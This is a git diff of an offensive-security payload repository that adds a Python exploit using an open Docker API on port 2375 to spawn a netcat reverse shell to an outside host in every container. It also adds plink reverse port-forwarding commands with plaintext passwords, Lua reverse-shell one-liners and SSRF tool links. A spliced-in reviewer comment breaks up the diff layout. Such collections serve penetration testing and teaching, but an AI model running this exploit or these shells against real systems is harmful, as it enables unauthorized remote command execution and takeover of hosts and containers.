diff --git a/CVE Exploits/Docker API RCE.py b/CVE Exploits/Docker API RCE.py
new file mode 100644
index 0000000..1f8cea9
--- /dev/null
+++ b/CVE Exploits/Docker API RCE.py
@@ -0,0 +1,48 @@
+import requests
+import logging
+import json
+import urllib.parse
+
+# NOTE
+# Enable Remote API with the following command
+# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
+# This is an intended feature, remember to filter the port 2375..
+
+name = "docker"
+description = "Docker RCE via Open Docker API on port 2375"
+author = "Swissky"
+
+# Step 1 - Extract id and name from each container
+ip = "127.0.0.1"
+port = "2375"
+data = "containers/json"
+url = "http://{}:{}/{}".format(ip, port, data)
+r = requests.get(url)
+
+if r.json:
+    for container in r.json():
+        container_id = container['Id']
+        container_name = container['Names'][0].replace('/','')
+        print(container_id, container_name)
+
+        # Step 2 - Prepare command
+        cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
+        data = "containers/{}/exec".format(container_name)
+        url = "http://{}:{}/{}".format(ip, port, data)
+        post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
+        post_header = {
+            "Content-Type": "application/json"
+        }
+        r = requests.post(url, json=json.loads(post_json))
+
+
+        # Step 3 - Execute command
+        id_cmd = r.json()['Id']
+        data = "exec/{}/start".format(id_cmd)
+        url = "http://{}:{}/{}".format(ip, port, data)
+        post_json = '{ "Detach":false,"Tty":false}'
+        post_header = {
+            "Content-Type": "application/json"
+        }
+        r = requests.post(url, json=json.loads(post_json))
+        print(r)
\ No newline at end of file
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 5203216..d49e426 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
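Review bot: The header comment in the new file says only to "filter the port 2375", which understates the mitigation: the exposure is the unauthenticated plaintext `-H tcp://0.0.0.0:2375` listener itself, so the note should also point to dockerd's TLS client-certificate mode (`--tlsverify` with `--tlscacert`, `--tlscert`, `--tlskey`) and to binding the TCP socket to a non-public interface rather than relying on a firewall rule alone. Two lines of the script are also misleading as written: `if r.json:` tests the bound method, which is always truthy, so it guards nothing (`if r.ok:` is presumably what was meant), and `post_header` is assigned in both Step 2 and Step 3 but never passed to `requests.post`, which already sets the JSON content type via `json=`. `logging` and `urllib.parse` are imported and never used. For readers using this file as a detection reference, a comment stating that each loop iteration performs a `containers/{name}/exec` create followed by `exec/{id}/start` would make the observable API call sequence explicit.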
@@ -92,6 +92,14 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro --hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE ``` +## plink + +```powershell +plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server +plink -l root -pw mypassword 192.168.18.84 -R +plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] +``` + ## Basic Pivoting Types | Type | Use Case | diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 497eb1c..44248b8 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -116,10 +116,18 @@ p.waitFor() ### Lua +Linux only + ```powershell lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` +Windows and Linux + +```powershell +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` + ### NodeJS ```javascript diff --git a/README.md b/README.md index d8eec19..43bb035 100644 --- a/README.md +++ b/README.md 
@@ -115,6 +115,7 @@ Grab a book and relax, these ones are the best security books (in my opinion). | `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) | | `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) | | `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) | +| `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) | | `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) | | `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) | | `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) | diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 7171923..8b9ddcd 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -2,6 +2,11 @@ Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf. +Tools: + +- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap) +- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus) + ## Summary * [Exploit with localhost](#summary) @@ -85,7 +90,6 @@ Bypass localhost with a domain redirecting to locahost ```powershell http://localtest.me -http://n-pn.info http://customer1.app.localhost.my.company.127.0.0.1.nip.io ``` diff --git a/XSS injection/README.md b/XSS injection/README.md index 35321d8..d9ef727 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -95,6 +95,11 @@ XSS for HTML5